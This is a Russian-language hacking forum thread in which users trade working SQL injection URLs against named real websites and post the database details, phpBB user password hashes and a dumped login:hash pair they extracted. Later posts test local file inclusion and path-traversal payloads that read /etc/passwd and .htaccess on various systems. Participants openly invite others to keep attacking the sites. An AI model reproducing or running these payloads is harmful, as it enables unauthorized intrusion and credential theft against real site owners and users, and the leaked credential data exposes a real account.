Software: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635. PHP/5.2.9 работает Software: Apache/2.2.3 (Debian) DAV/2 PHP/4.4.4-8+etch6 mod_ssl/2.2.3 OpenSSL/0.9.8c. PHP/4.4.4-8+etch6 работает Software: Apache/1.3.37 (Unix) mod_perl/1.29 mod_ssl/2.8.28 OpenSSL/0.9.8d PHP/4.4.7 uname -a: SunOS jan 5.8 Generic_117350-54 sun4u работает Software: Apache/1.3.34 (Debian) PHP/4.4.4-8+etch6. PHP/4.4.4-8+etch6 работает Software: Apache/2.0.63. PHP/5.2.6 uname -a: Linux raffles 2.6.18-6-686-bigmem #1 SMP Tue May 5 02:00:57 UTC 2009 i686 работает в Большинстве случаев работает как раз
http://art.specialradio.ru/index.php?id=-399+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9 может кто-то докавыряет дальше... с этим можно что-то сделать? http://www.telemultimedia.ru/news.php?id=2702'
Обсуждалось это, ну или примерно это вот тут : https://forum.antichat.ru/showthread.php?t=98525 Вот пост по теме из той-же ветки https://forum.antichat.ru/showpost.php?p=1024096&postcount=37 Сейчас провели несколько тестов , респект Qwazar и BlackSun На лине везде работает (но это тесты, тоесть то, что было под рукой) , на фре работает вот так: Тоесть случай из примера не сработает А вообще интересно, если у кого-то есть желание, пошарьтесь по шеллам, потестируйте. До конца зависимости так и не понятны
Дальше это куда куда ?) Вот юзера форума http://art.specialradio.ru/index.php?id=-399+union+select+1,concat_ws(0x2F,username,user_password),3,4,5,6,7,8,9+from+phpbb_users+limit+1,1
FreeBSD 6.3-RELEASE-p2 Code: include('asd/../../../../../../../../../home/u*****/********/www/robots.txt'); include('/asd/../../../../../../../../../home/u*****/********/www/robots.txt'); Оба работают. FreeBSD 6.4-RELEASE Code: include('/asd../../../../../../../../../usr/home/bla_bla_bla/.htaccess'); include('asd../../../../../../../../../usr/home/bla_bla_bla/.htaccess'); Оба работают. Linux 2.6.24.4-nmm2 Code: include('/asd../../../../../../www/htdocs/w*******/robots.txt'); include('asd../../../../../../www/htdocs/w*******/robots.txt'); Оба работают. Linux 2.4.33.2 Code: include('asdasd../../../../../../../../../../home/user/www/index.html'); include('/asdasd../../../../../../../../../../home/user/www/index.html'); Пашет только второй. Darwin 9.7.0 Code: include('/asdasd../../../../../../etc/passwd'); include('asdasd../../../../../../etc/passwd'); Оба работают. Вечером приду домой может еще посмотрю.
http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()) вывод: 5.0.45:kitanaru@localhost:kitanaru через infromation_schema.tables нашлось user_profile, два столбца: usuer_id и password. Вывод значений не произошел. решил проверить, а есть ли в этой таблице записи? http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,count(*)+from+user_profile Оказалось ноль.. затем нашел таблицу personal http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,concat_ws(0x3a,login,psw)+from+personal+limit+0,1 ALLA:bee7a699d0bd762b85db6deaca1c5f40 всего три учетки... limit+1,1 и +limit+2,1
Я не понимаю. Было же значит код примерно такой: значит если передать параметр value равный "../../../../etc/passwd%00", то в скрипте включится файл /var/www/site/htdocs/config../../../../etc/passwd Значит инклуд пройдёт, только если в папке htdocs есть папка config и мы добавим к значению value ещё "../" и никак иначе. А если передать значение параметра value равное "/././././.[4096 символов '/.']/etc/passwd%00" (что, наверное, и имелл в виду jokester, ссылаясь на пост [Raz0r]a), то скриптом подключится файл /var/www/site/htdocs/config Что разве не так? Я запарился всё это писать только чтоб понять о чём вы тут говорите
нет, не так мы тут говорим о том что не всегда можно выполнить переход вверх из несуществующей папки. В твоём случае папки config не существует А про слеши это всего лишь пример, где Рейзор говорит что для линуха обязательно нужна существующая папка. Но как я говорил в той теме, так и в этой, в некоторых версиях пшп (достоверно неизвестно), папка не обязательно должна существовать
Да, где-то тоже о таком читал, но везде, где я не пробовал - папка не обязательна... Мб это просто удачные совпадения.
Сушествования папки не обязатель, попробуй у себя на локалке, php будет игноривать путь где мы подымаемься вверх с помошью /../ и нам все равно есть такая папка или нет перед 1 поднятием вверх.
Нужно, чтоб в include_path (в php.ini) хотя бы один абсолютный путь был прописан, тогда можно проэксплуатировать такой LFI. (; add: Я это о способе проведения LFI через path truncation attack написал, если что.
